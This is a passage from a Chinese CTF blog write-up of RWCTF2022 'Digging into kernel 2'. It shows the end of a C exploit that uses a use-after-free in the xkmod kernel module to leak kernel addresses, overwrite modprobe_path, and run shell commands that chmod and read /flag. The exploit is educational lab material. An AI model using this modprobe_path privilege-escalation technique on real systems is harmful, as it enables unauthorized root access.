	<span class="token keyword">int</span> fd1 <span class="token operator">=</span> <span class="token function">open</span><span class="token punctuation">(</span><span class="token string">"/dev/xkmod"</span><span class="token punctuation">,</span> O_RDONLY<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>fd1<span class="token operator">></span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"[+] Dev1 Opened"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">add</span><span class="token punctuation">(</span>fd1<span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token keyword">int</span> fd2 <span class="token operator">=</span> <span class="token function">open</span><span class="token punctuation">(</span><span class="token string">"/dev/xkmod"</span><span class="token punctuation">,</span> O_RDONLY<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>fd2<span class="token operator">></span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"[+] Dev2 Opened"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	
	<span class="token function">add</span><span class="token punctuation">(</span>fd2<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"[-] Dev1 Closed"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">close</span><span class="token punctuation">(</span>fd1<span class="token punctuation">)</span><span class="token punctuation">;</span>

	buf <span class="token operator">=</span> <span class="token function">malloc</span><span class="token punctuation">(</span><span class="token number">0x300</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">get</span><span class="token punctuation">(</span>fd2<span class="token punctuation">,</span> buf<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">8</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	leak <span class="token operator">=</span> <span class="token operator">*</span><span class="token punctuation">(</span><span class="token class-name">size_t</span> <span class="token operator">*</span><span class="token punctuation">)</span>buf<span class="token punctuation">;</span>
	<span class="token class-name">size_t</span> kheap <span class="token operator">=</span> leak <span class="token operator">&amp;</span> <span class="token number">0xfffffffff0000000</span> <span class="token punctuation">;</span>
	<span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"[*] kheap => 0x%lx\n"</span><span class="token punctuation">,</span> kheap<span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token operator">*</span><span class="token punctuation">(</span><span class="token class-name">size_t</span> <span class="token operator">*</span><span class="token punctuation">)</span>buf <span class="token operator">=</span> kheap<span class="token operator">+</span><span class="token number">0x9d000</span><span class="token operator">-</span><span class="token number">0x10</span><span class="token punctuation">;</span><span class="token comment">//next->0xffff888005e529c0</span>
	<span class="token function">set</span><span class="token punctuation">(</span>fd2<span class="token punctuation">,</span> buf<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">0x8</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">add</span><span class="token punctuation">(</span>fd2<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">add</span><span class="token punctuation">(</span>fd2<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">get</span><span class="token punctuation">(</span>fd2<span class="token punctuation">,</span> buf<span class="token punctuation">,</span> <span class="token number">0x10</span><span class="token punctuation">,</span> <span class="token number">8</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	leak <span class="token operator">=</span> <span class="token operator">*</span><span class="token punctuation">(</span><span class="token class-name">size_t</span> <span class="token operator">*</span><span class="token punctuation">)</span>buf<span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token punctuation">(</span>leak<span class="token operator">&amp;</span><span class="token number">0xffffffff00000000</span><span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token number">0xffffffff00000000</span><span class="token punctuation">)</span> <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token string">"failed to leak"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token class-name">size_t</span> koff <span class="token operator">=</span> leak<span class="token operator">-</span><span class="token number">0xffffffff81000030</span><span class="token punctuation">;</span>
	<span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"[*] koff => 0x%lx\n"</span><span class="token punctuation">,</span> koff<span class="token punctuation">)</span><span class="token punctuation">;</span>


	<span class="token comment">/* UAF2 */</span>
	<span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"[*] ------UAF2------"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">int</span> fd3 <span class="token operator">=</span> <span class="token function">open</span><span class="token punctuation">(</span><span class="token string">"/dev/xkmod"</span><span class="token punctuation">,</span> O_RDONLY<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>fd3<span class="token operator">></span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"[+] Dev3 Opened"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">add</span><span class="token punctuation">(</span>fd3<span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token keyword">int</span> fd4 <span class="token operator">=</span> <span class="token function">open</span><span class="token punctuation">(</span><span class="token string">"/dev/xkmod"</span><span class="token punctuation">,</span> O_RDONLY<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>fd4<span class="token operator">></span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"[+] Dev4 Opened"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	
	<span class="token function">add</span><span class="token punctuation">(</span>fd4<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"[-] Dev3 Closed"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">close</span><span class="token punctuation">(</span>fd3<span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token operator">*</span><span class="token punctuation">(</span><span class="token class-name">size_t</span> <span class="token operator">*</span><span class="token punctuation">)</span>buf <span class="token operator">=</span> MODPROBE_PATH<span class="token operator">-</span><span class="token number">0x10</span><span class="token punctuation">;</span>
	<span class="token function">set</span><span class="token punctuation">(</span>fd4<span class="token punctuation">,</span> buf<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">0x8</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	
	<span class="token function">add</span><span class="token punctuation">(</span>fd4<span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">add</span><span class="token punctuation">(</span>fd4<span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token function">strcpy</span><span class="token punctuation">(</span>buf<span class="token punctuation">,</span> <span class="token string">"/home/getflag"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">set</span><span class="token punctuation">(</span>fd4<span class="token punctuation">,</span> buf<span class="token punctuation">,</span> <span class="token number">0x10</span><span class="token punctuation">,</span> <span class="token number">0x10</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"echo -e '#!/bin/sh\n/bin/chmod 777 /flag' > /home/getflag"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
	<span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"chmod +x /home/getflag"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"echo -e '\\xff\\xff\\xff\\xff' > /home/fake"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"chmod +x /home/fake"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"/home/fake"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">int</span> flag_fd <span class="token operator">=</span> <span class="token function">open</span><span class="token punctuation">(</span><span class="token string">"/flag"</span><span class="token punctuation">,</span> O_RDONLY<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>flag_fd <span class="token operator">&lt;</span> <span class="token number">0</span><span class="token punctuation">)</span> <span class="token function">errExit</span><span class="token punctuation">(</span><span class="token string">"failed to chmod flag!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"cat /flag"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="/EXP_FILE/e68c51cce1233afc601332d12b0295fe_MD5.jpeg"></p>

	  <div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.</a>
</div>

	</div>

	
	<span id="/2024/03/22/RWCTF2022%E9%AB%98%E6%A0%A1%E8%B5%9B%20-%20Digging%20into%20kernel%201%20&amp;%202/" class="leancloud-visitors view" data-flag-title="RWCTF2022高校赛 - Digging into kernel 1 &amp; 2">
		<em class="post-meta-item-text"> Page View </em> <i class="leancloud-visitors-count"></i>
	</span>
	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a type="button" class="btn btn-default disabled"><i class="fa fa-arrow-circle-o-left"></i>Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/03/18/OWASP Top10-2021/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
		<section id="comments" class="comments">
			<style>
			.comments{margin:30px;padding:10px;background:rgb(0, 0, 0)}
			@media screen and (max-width:800px){.comments{margin:auto;padding:10px;background:#000}}
			</style>
			<div id="vcomment" class="comment"></div>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script src="https://cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
var valineConfig = {"enable":true,"appId":"QrmzEeS3e4xvmJxO1dSPlkW4-gzGzoHsz","appKey":"ov6uvwKnDQmJxtpeS0wvBIwL","placeholder":"","visitor":true,"avatar":"monsterid","requiredFields":["nick","mail"],"pageView":true}
valineConfig.el='#vcomment';
new Valine(valineConfig);
    // new Valine({
    //     el: '#vcomment',
    //     appId: "",
    //     appKey: "",
    //     placeholder: "",
    //     avatar:"monsterid",
    //     visitor: "true",
    //     requiredFields: "nick,mail".split(','),
    // });
</script>

		</section>
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-03-22 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/赛题/">赛题<span>5</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#Digging-into-kernel"><span class="toc-article-text">Digging into kernel</span></a></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#Digging-into-kernel-2"><span class="toc-article-text">Digging into kernel 2</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E4%B8%80%E3%80%81%E9%80%86%E5%90%91%E5%88%86%E6%9E%90"><span class="toc-article-text">一、逆向分析</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#run-sh"><span class="toc-article-text">run.sh</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#rcS"><span class="toc-article-text">rcS</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#xkmod-ko"><span class="toc-article-text">xkmod.ko</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E4%BA%8C%E3%80%81%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-article-text">二、利用思路</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E4%B8%89%E3%80%81EXP"><span class="toc-article-text">三、EXP</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#EXP-modprobe-path"><span class="toc-article-text">EXP-modprobe_path</span></a></li></ol></li></ol></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2024 X1NRI's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
